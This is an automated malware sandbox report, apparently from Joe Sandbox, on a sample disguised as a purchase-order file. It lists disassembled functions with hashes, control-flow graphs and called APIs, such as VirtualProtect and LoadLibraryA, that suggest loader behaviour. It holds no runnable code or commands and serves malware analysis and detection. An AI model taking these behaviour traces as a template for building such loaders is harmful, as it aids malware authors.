                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 32f7532234f3b47337753e5a4daa60a4fe13e582d64f4780f89f13378446b0aa
                                                            • Instruction ID: 7e63eb0830008cafef1a82936695a75c33aa5937bcb3cbf9aceca1fb3d4fa999
                                                            • Opcode Fuzzy Hash: 32f7532234f3b47337753e5a4daa60a4fe13e582d64f4780f89f13378446b0aa
                                                            • Instruction Fuzzy Hash: 72419D3260D78A1FD71E9A748C621B57BA5EB43320B0582BFD087CB1E7DD1C684683D1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD348A4CAF Relevance: .2, Instructions: 163COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8411ff85c1ddb09822fa517693dbaf5886babb989bcbc25e060748e2842d526b
                                                            • Instruction ID: d07e97532dec393c16f97b418019fab844768944f42e9c20ae4caa747f696b6b
                                                            • Opcode Fuzzy Hash: 8411ff85c1ddb09822fa517693dbaf5886babb989bcbc25e060748e2842d526b
                                                            • Instruction Fuzzy Hash: 3941683160D78A0FD72E9B7488651B53BA5EB83310B1582BFD18BCB1E7DD6CA80683D1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD34892780 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 305libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 129 7ffd34892780-7ffd348927cf 133 7ffd348927d3 129->133 134 7ffd3489281a-7ffd34892828 133->134 135 7ffd348927d4-7ffd348927e3 133->135 134->133 136 7ffd3489282a-7ffd3489283d 134->136 141 7ffd348927ea-7ffd348927ed 135->141 139 7ffd34892842-7ffd3489285d 136->139 139->139 140 7ffd3489285f-7ffd348928ac 139->140 148 7ffd348928ae-7ffd348928d5 140->148 149 7ffd3489291f-7ffd34892982 LoadLibraryA 140->149 142 7ffd348927ef-7ffd348927ff 141->142 143 7ffd34892800-7ffd34892817 141->143 143->134 148->149 152 7ffd348928d7-7ffd348928da 148->152 153 7ffd3489298a-7ffd348929be call 7ffd348929da 149->153 154 7ffd34892984 149->154 155 7ffd348928dc-7ffd348928ef 152->155 156 7ffd34892914-7ffd3489291c 152->156 163 7ffd348929c5-7ffd348929d9 153->163 164 7ffd348929c0 153->164 154->153 158 7ffd348928f1 155->158 159 7ffd348928f3-7ffd34892906 155->159 156->149 158->159 159->159 161 7ffd34892908-7ffd34892910 159->161 161->156 164->163
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID: $
                                                            • API String ID: 1029625771-3993045852
                                                            • Opcode ID: 1f1b086caa8e5f62a76c26172bfb2306998724981cf38cdd1b9955bde27e936f
                                                            • Instruction ID: b6aa7a8626c6c4945177236671aab1700c3621c6429783a928fa1bf5362c67fc
                                                            • Opcode Fuzzy Hash: 1f1b086caa8e5f62a76c26172bfb2306998724981cf38cdd1b9955bde27e936f
                                                            • Instruction Fuzzy Hash: 2A91E431608A4D4FEB98EF28D8967F57BE1FF5A310F00417EE90DC7292DA39A8418781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD34890E8F Relevance: 1.7, APIs: 1, Instructions: 211COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 943 7ffd34890e8f-7ffd34890e91 944 7ffd34890f0b-7ffd3489285d 943->944 945 7ffd34890e93-7ffd34890eb8 943->945 948 7ffd3489285f-7ffd348928ac 944->948 949 7ffd34892842-7ffd3489285d 944->949 954 7ffd348928ae-7ffd348928d5 948->954 955 7ffd3489291f-7ffd34892982 LoadLibraryA 948->955 949->948 949->949 954->955 958 7ffd348928d7-7ffd348928da 954->958 959 7ffd3489298a-7ffd348929be call 7ffd348929da 955->959 960 7ffd34892984 955->960 961 7ffd348928dc-7ffd348928ef 958->961 962 7ffd34892914-7ffd3489291c 958->962 969 7ffd348929c5-7ffd348929d9 959->969 970 7ffd348929c0 959->970 960->959 964 7ffd348928f1 961->964 965 7ffd348928f3-7ffd34892906 961->965 962->955 964->965 965->965 967 7ffd34892908-7ffd34892910 965->967 967->962 970->969
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 726c3a1d003576a8a2fa169940b13d9e79b5735dcca5ed75bf774f0acd03156c
                                                            • Instruction ID: c99220c7311f02d039df78257204a2beafa44c9194bf4f6170f2aa0eee9dbdae
                                                            • Opcode Fuzzy Hash: 726c3a1d003576a8a2fa169940b13d9e79b5735dcca5ed75bf774f0acd03156c
                                                            • Instruction Fuzzy Hash: EC61B530608A4D8FEB98EF58D8557F97BE1FF55311F00413EE94EC7292DA78A8458B81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD348997FD Relevance: 1.7, APIs: 1, Instructions: 173COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 971 7ffd348997fd-7ffd3489980e 972 7ffd34899815-7ffd34899849 971->972 977 7ffd348997f7 972->977 978 7ffd3489984b-7ffd348a8833 972->978 977->971 985 7ffd348a883b-7ffd348a887f VirtualProtect 978->985 986 7ffd348a8887-7ffd348a88af 985->986 987 7ffd348a8881 985->987 987->986
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be8713909922bef9eb716e0e6045d31899e238d3634e07e9e19e27b713f1412c
                                                            • Instruction ID: 49fb485bf592f327a98339a5ece82e70103f08415d43194decdbcb00924104fb
                                                            • Opcode Fuzzy Hash: be8713909922bef9eb716e0e6045d31899e238d3634e07e9e19e27b713f1412c
                                                            • Instruction Fuzzy Hash: 39412732A0CA189FD714EB9CE8A66FA7BE4EF52321F08413FD149D3153DE3464468B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD3489045D Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1305 7ffd3489045d-7ffd34890474 1308 7ffd34890456 1305->1308 1309 7ffd34890476-7ffd3489049a 1305->1309 1308->1305 1313 7ffd348904fc 1309->1313 1314 7ffd3489049c 1309->1314 1315 7ffd34890a80-7ffd34890ac2 1313->1315 1316 7ffd34890532-7ffd34890541 1313->1316 1317 7ffd3489049e-7ffd348904b7 1314->1317 1318 7ffd348904d2-7ffd348904d3 1314->1318 1326 7ffd34890aca-7ffd34890afc FreeConsole 1315->1326 1319 7ffd34890582-7ffd3489059e 1316->1319 1320 7ffd34890543-7ffd34890581 1316->1320 1317->1318 1318->1315 1320->1319 1328 7ffd34890afe 1326->1328 1329 7ffd34890b04-7ffd34890b2b 1326->1329 1328->1329
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b0e86f7e8e1d3f845723dce14de908bca87a1aea54b76e148138a26ba94b4613
                                                            • Instruction ID: a8a5af724b8e19d376c73b38e8214f97e00240ab9ea52d3a987db828591fc2de
                                                            • Opcode Fuzzy Hash: b0e86f7e8e1d3f845723dce14de908bca87a1aea54b76e148138a26ba94b4613
                                                            • Instruction Fuzzy Hash: 71413431A0CA988FE725DBA898A56F97FE0EF53324F0441BFD089C7193DA297849C751
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD34890EC5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1330 7ffd34890ec5-7ffd34890ee3 1334 7ffd34890ee6-7ffd34890efc 1330->1334 1335 7ffd34890f1a-7ffd34892e4f VirtualProtect 1330->1335 1340 7ffd34890f19-7ffd34890f2f 1334->1340 1341 7ffd34890efe-7ffd34890f17 1334->1341 1345 7ffd34892e57-7ffd34892e7f 1335->1345 1346 7ffd34892e51 1335->1346 1348 7ffd34890f30 1340->1348 1341->1340 1346->1345 1348->1348
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b70c70cdb815cf6bf1ec3cf3775b6998255d24c7809f7624e18c53a4970a089c
                                                            • Instruction ID: 461a585338766af67a18def423ad84cb3994b3128f1a9c762c9849ccbbbed216
                                                            • Opcode Fuzzy Hash: b70c70cdb815cf6bf1ec3cf3775b6998255d24c7809f7624e18c53a4970a089c
                                                            • Instruction Fuzzy Hash: 0A41E431A0CA8D4FEB18DBA898596FDBFE0EF66321F04027FD049C3192DB6468468791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD34892D84 Relevance: 1.6, APIs: 1, Instructions: 129memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1350 7ffd34892d84-7ffd34892d8b 1351 7ffd34892d96-7ffd34892e4f VirtualProtect 1350->1351 1352 7ffd34892d8d-7ffd34892d95 1350->1352 1356 7ffd34892e57-7ffd34892e7f 1351->1356 1357 7ffd34892e51 1351->1357 1352->1351 1357->1356
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 66b52229d3acae203a5a4f92c397c789d9128913553a301167bfc3cf46ee5f70
                                                            • Instruction ID: 16f47ea17cd302a514e5172de3d94429d8d483e31c4c52c989f38da2584ed763
                                                            • Opcode Fuzzy Hash: 66b52229d3acae203a5a4f92c397c789d9128913553a301167bfc3cf46ee5f70
                                                            • Instruction Fuzzy Hash: 8531F831A0CA4C4FDB18DB9C98466F9BBE1FB56321F04426FD049D3192CF746856C791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD34890A58 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1358 7ffd34890a58-7ffd34890a5f 1359 7ffd34890a6a-7ffd34890afc FreeConsole 1358->1359 1360 7ffd34890a61-7ffd34890a69 1358->1360 1364 7ffd34890afe 1359->1364 1365 7ffd34890b04-7ffd34890b2b 1359->1365 1360->1359 1364->1365
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID: ConsoleFree
                                                            • String ID:
                                                            • API String ID: 771614528-0
                                                            • Opcode ID: 282e8a0d377cb565f2cd24fe659e0e1841efd16c68d0ec2a0982305d8edc3660
                                                            • Instruction ID: 29f299a29b291688b7430652bb5581c4bb3917a5b688e3737475d5dede3cdfcd
                                                            • Opcode Fuzzy Hash: 282e8a0d377cb565f2cd24fe659e0e1841efd16c68d0ec2a0982305d8edc3660
                                                            • Instruction Fuzzy Hash: 9C31C571A0CB488FDB29DFA8D84A6FA7BF0EF56320F00426ED049D3192DB74A445CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD34971269 Relevance: .1, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2151235986.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34970000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c9a4e0eb7c72b8217adf61ff34b517981aff4da8eb166e797b30a4c60c76f071
                                                            • Instruction ID: 9d39e503387f3fca96bc0c8a549152b364ab9af8f947c6bda79b2a475647db7a
                                                            • Opcode Fuzzy Hash: c9a4e0eb7c72b8217adf61ff34b517981aff4da8eb166e797b30a4c60c76f071
                                                            • Instruction Fuzzy Hash: 10414531A0CA894FDB56DF28CCA60A87FF1FF16300B0541BED589CB696EA28A841C741
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 00007FFD348A4559 Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .d$$gfff
                                                            • API String ID: 0-423341030
                                                            • Opcode ID: a4637abb0af41b68b17169bc6f7084b867f7666b97c91d65d5bdd5882465e0a0
                                                            • Instruction ID: f614ed5545537655c9c7a1c4ca1aa33d9734b3090d40ef5fe4f1fcceeba5bdea
                                                            • Opcode Fuzzy Hash: a4637abb0af41b68b17169bc6f7084b867f7666b97c91d65d5bdd5882465e0a0
                                                            • Instruction Fuzzy Hash: C151373260E3850FD31E863D9C965A17FA5DB8722070982FFD4C6CB1A3E958AC07C391
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD348988D0 Relevance: .6, Instructions: 555COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39ca99048702d55c60c7228dfccdc9061d4c3a38e3cdf62f8be3d435bc9ffe8f
                                                            • Instruction ID: 5df4773e9d2abddee1a2f8a62338b0e403c80b69a77cda5ffa37095e7bf2eced
                                                            • Opcode Fuzzy Hash: 39ca99048702d55c60c7228dfccdc9061d4c3a38e3cdf62f8be3d435bc9ffe8f
                                                            • Instruction Fuzzy Hash: 2FF17D31F1E98A4FE3E8CB1C88A656577D0FF8A310B1402B9D94DC7592DEACBC1653A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD348988B8 Relevance: .5, Instructions: 549COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 478ae6c5cb56947789cae150aa37d85f797e83d08b0de72975a0f0705e50fcd0
                                                            • Instruction ID: 8b3c82858f6ba5394f7aff7a81c34edfffbe501fac4cd2677f106f3c3b87e974
                                                            • Opcode Fuzzy Hash: 478ae6c5cb56947789cae150aa37d85f797e83d08b0de72975a0f0705e50fcd0
                                                            • Instruction Fuzzy Hash: 8EF18031B0FA864FE7E9DB1C88A65713BD0EF57300B1405BAD94DCB2A2D95CBC0997A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD348988C8 Relevance: .5, Instructions: 506COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cb6f46fca3cbf2ba73df5770ae36b95aed5adbdc63060dc337c51d7484c3a70c
                                                            • Instruction ID: 90a7a8acbcec7761e7e0c04a4c2c7642aeedcb189d5f525b46e726dc64ad7fe9
                                                            • Opcode Fuzzy Hash: cb6f46fca3cbf2ba73df5770ae36b95aed5adbdc63060dc337c51d7484c3a70c
                                                            • Instruction Fuzzy Hash: C5F16E31B1E9854FE7F8DB1C84A667577D0FF8A310B1405B9D24DCB1A2DEACAC0683A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD34899F7C Relevance: .3, Instructions: 333COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 75a5a8d9501445e4ae39ee23e9225555fa7984956c1d8a1ebb4cd4f8a9ab4b85
                                                            • Instruction ID: 9458fedf5d6a58d8a6056af01ff732e1c6e14b59196db1ce9a3ae14e555b3e7e
                                                            • Opcode Fuzzy Hash: 75a5a8d9501445e4ae39ee23e9225555fa7984956c1d8a1ebb4cd4f8a9ab4b85
                                                            • Instruction Fuzzy Hash: D281A926A8E7C24FE3538B744CB50957FB59E1361071E51EBC984CF1E3EA0D580AE722
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD3489AA6A Relevance: .3, Instructions: 295COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 417855fb1fb5d33fee4ffed67f37656ecf172f77c6ca23542757f2774553d239
                                                            • Instruction ID: b55f32c0dd0c6b3abe8fbcdb87c0cd7d481a50634f9f8b0786a6abacb5cf16a6
                                                            • Opcode Fuzzy Hash: 417855fb1fb5d33fee4ffed67f37656ecf172f77c6ca23542757f2774553d239
                                                            • Instruction Fuzzy Hash: 8C718426A8E7C20FE31347744CB40A57FB5AE2365431E42EBC5D5CB0E3DA0D280AE722
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD34899D5D Relevance: .3, Instructions: 281COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fecae9f6c5482d082198bf177daccb861c9e561450914e0581a92122ebad2c1f
                                                            • Instruction ID: 4b8f97f0b31f5609485e4cb0abde8c3e92ecfcdc1b5fc74cacb2dbc3b61bcbf1
                                                            • Opcode Fuzzy Hash: fecae9f6c5482d082198bf177daccb861c9e561450914e0581a92122ebad2c1f
                                                            • Instruction Fuzzy Hash: 9A710631E1DB860FD3569B6888A10A57FE0EF43310B1946FAC59AC76D3DA2CB8478B51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:9.6%
                                                            Dynamic/Decrypted Code Coverage:80.4%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:51
                                                            Total number of Limit Nodes:4
                                                            execution_graph 41066 604d3b0 41067 604d3b6 CreateWindowExW 41066->41067 41069 604d4d4 41067->41069 41069->41069 41070 604fad0 41071 604fb00 41070->41071 41072 604fb42 41071->41072 41073 604fbec 41071->41073 41074 604fb9a CallWindowProcW 41072->41074 41076 604fb49 41072->41076 41077 604a764 41073->41077 41074->41076 41078 604a76f 41077->41078 41080 604e319 41078->41080 41081 604a88c CallWindowProcW 41078->41081 41080->41080 41081->41080 41082 f67040 41083 f6704a 41082->41083 41084 f6708c 41083->41084 41090 5f0cab0 41083->41090 41095 5f0caa1 41083->41095 41085 f6705d 41100 5f0de60 41085->41100 41104 5f0de50 41085->41104 41091 5f0cac5 41090->41091 41092 5f0ccda 41091->41092 41093 5f0d108 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41091->41093 41094 5f0d0f8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41091->41094 41092->41085 41093->41091 41094->41091 41097 5f0cab0 41095->41097 41096 5f0ccda 41096->41085 41097->41096 41098 5f0d108 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41097->41098 41099 5f0d0f8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41097->41099 41098->41097 41099->41097 41103 5f0de7a 41100->41103 41101 5f0d108 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41101->41103 41102 5f0e0bd 41102->41084 41103->41101 41103->41102 41105 5f0de60 41104->41105 41106 5f0d108 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41105->41106 41107 5f0e0bd 41105->41107 41106->41105 41107->41084 41108 edd030 41110 edd048 41108->41110 41109 edd0a2 41110->41109 41111 604a764 CallWindowProcW 41110->41111 41115 604d568 41110->41115 41119 604e2b8 41110->41119 41123 604d557 41110->41123 41111->41109 41116 604d56a 41115->41116 41117 604a764 CallWindowProcW 41116->41117 41118 604d5af 41117->41118 41118->41109 41120 604e2bc 41119->41120 41122 604e319 41120->41122 41127 604a88c CallWindowProcW 41120->41127 41122->41122 41124 604d55c 41123->41124 41125 604a764 CallWindowProcW 41124->41125 41126 604d5af 41125->41126 41126->41109 41127->41122

                                                            Executed Functions

                                                            Function 00F69BC0 Relevance: 3.0, Instructions: 2996COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0b5d635c209f4127f710f93e67917d29b5ac547c0a78f74997502f03c67651c9
                                                            • Instruction ID: a1da4ef8d6ecde6cf2518fc1c60d99e19d3236033243da5f9d4b4114af4a309d
                                                            • Opcode Fuzzy Hash: 0b5d635c209f4127f710f93e67917d29b5ac547c0a78f74997502f03c67651c9
                                                            • Instruction Fuzzy Hash: 4063FC31D10B5A8ACB11EF68C8905A9F7B1FF99310F15C79AE458B7125EB70AAC4CF81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F6CD80 Relevance: 2.3, Instructions: 2299COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 87354762e498a973af33ceb7372e50d4899f603606237e8158c1b11d655a3cd5
                                                            • Instruction ID: db9dc2b8e0ee7dbeda981a65765bda20b4c87a40a7993a202dac083e12d95e4a
                                                            • Opcode Fuzzy Hash: 87354762e498a973af33ceb7372e50d4899f603606237e8158c1b11d655a3cd5
                                                            • Instruction Fuzzy Hash: 2B332E31D107198EDB11EF68C8806ADF7B1FF99310F15C79AE458AB215EB70AAC5CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F63E30 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1299 f63e30-f63e96 1301 f63ee0-f63ee2 1299->1301 1302 f63e98-f63ea3 1299->1302 1304 f63ee4-f63f3c 1301->1304 1302->1301 1303 f63ea5-f63eb1 1302->1303 1305 f63ed4-f63ede 1303->1305 1306 f63eb3-f63ebd 1303->1306 1313 f63f86-f63f88 1304->1313 1314 f63f3e-f63f49 1304->1314 1305->1304 1307 f63ec1-f63ed0 1306->1307 1308 f63ebf 1306->1308 1307->1307 1310 f63ed2 1307->1310 1308->1307 1310->1305 1316 f63f8a-f63fa2 1313->1316 1314->1313 1315 f63f4b-f63f57 1314->1315 1317 f63f7a-f63f84 1315->1317 1318 f63f59-f63f63 1315->1318 1323 f63fa4-f63faf 1316->1323 1324 f63fec-f63fee 1316->1324 1317->1316 1319 f63f67-f63f76 1318->1319 1320 f63f65 1318->1320 1319->1319 1322 f63f78 1319->1322 1320->1319 1322->1317 1323->1324 1326 f63fb1-f63fbd 1323->1326 1325 f63ff0-f6403e 1324->1325 1334 f64044-f64052 1325->1334 1327 f63fe0-f63fea 1326->1327 1328 f63fbf-f63fc9 1326->1328 1327->1325 1330 f63fcd-f63fdc 1328->1330 1331 f63fcb 1328->1331 1330->1330 1332 f63fde 1330->1332 1331->1330 1332->1327 1335 f64054-f6405a 1334->1335 1336 f6405b-f640bb 1334->1336 1335->1336 1343 f640bd-f640c1 1336->1343 1344 f640cb-f640cf 1336->1344 1343->1344 1345 f640c3 1343->1345 1346 f640d1-f640d5 1344->1346 1347 f640df-f640e3 1344->1347 1345->1344 1346->1347 1348 f640d7-f640da call f60ab8 1346->1348 1349 f640e5-f640e9 1347->1349 1350 f640f3-f640f7 1347->1350 1348->1347 1349->1350 1352 f640eb-f640ee call f60ab8 1349->1352 1353 f64107-f6410b 1350->1353 1354 f640f9-f640fd 1350->1354 1352->1350 1355 f6410d-f64111 1353->1355 1356 f6411b-f6411f 1353->1356 1354->1353 1358 f640ff-f64102 call f60ab8 1354->1358 1355->1356 1360 f64113 1355->1360 1361 f64121-f64125 1356->1361 1362 f6412f 1356->1362 1358->1353 1360->1356 1361->1362 1363 f64127 1361->1363 1364 f64130 1362->1364 1363->1362 1364->1364
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.3306647545.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_f60000_jsc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \VTm
                                                            • API String ID: 0-628799665
                                                            • Opcode ID: 2859d2357503de3e6f5ea4e9157a5492affdda13b23b1641f4e2046ee5ceaf46
                                                            • Instruction ID: db61d43cbdc91eed4de09b7031e7f6035306a518719444222bc8d16d52481cb4
                                                            • Opcode Fuzzy Hash: 2859d2357503de3e6f5ea4e9157a5492affdda13b23b1641f4e2046ee5ceaf46
